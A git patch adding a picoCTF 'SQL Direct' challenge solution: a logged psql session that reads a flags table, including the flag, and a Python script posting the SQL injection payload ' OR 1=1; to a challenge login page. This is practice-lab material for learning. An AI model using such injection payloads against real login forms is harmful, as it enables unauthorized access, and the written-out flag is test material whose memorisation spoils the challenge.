From aecaf4b417d49fad697694c3a7e34d5f9f566b93 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Thu, 5 Sep 2024 18:51:15 +0200
Subject: [PATCH] web/sql_direct

---
 web/sql_direct/output.txt | 23 +++++++++++++++++++++++
 web/sql_direct/solve.py   | 25 +++++++++++++++++++++++++
 2 files changed, 48 insertions(+)
 create mode 100644 web/sql_direct/output.txt
 create mode 100755 web/sql_direct/solve.py

diff --git a/web/sql_direct/output.txt b/web/sql_direct/output.txt
new file mode 100644
index 0000000..fd722e7
--- /dev/null
+++ b/web/sql_direct/output.txt
@@ -0,0 +1,23 @@
+$ psql -h saturn.picoctf.net -p 56842 -U postgres pico
+Password for user postgres:
+psql (14.13, server 15.2 (Debian 15.2-1.pgdg110+1))
+WARNING: psql major version 14, server major version 15.
+         Some psql features might not work.
+Type "help" for help.
+
+pico=# \d
+         List of relations
+ Schema | Name  | Type  |  Owner
+--------+-------+-------+----------
+ public | flags | table | postgres
+(1 row)
+
+pico=# SELECT * FROM flags;
+ id | firstname | lastname  |                address
+----+-----------+-----------+----------------------------------------
+  1 | Luke      | Skywalker | picoCTF{L3arN_S0m3_5qL_t0d4Y_21c94904}
+  2 | Leia      | Organa    | Alderaan
+  3 | Han       | Solo      | Corellia
+(3 rows)
+
+pico=# \q
diff --git a/web/sql_direct/solve.py b/web/sql_direct/solve.py
new file mode 100755
index 0000000..9691b42
--- /dev/null
+++ b/web/sql_direct/solve.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.requests
+
+import requests
+# from bs4 import BeautifulSoup
+
+BASE_URL = "http://saturn.picoctf.net:52814/"
+
+def main():
+    s = requests.Session()
+
+    res = s.post(
+        BASE_URL + "login.php",
+        data = {
+            'username': "' OR 1=1;",
+            'password': 'asdf',
+            'submit': 'Login',
+        },
+    )
+
+    print(res)
+    print(res.text)
+
+if __name__ == "__main__":
+    main()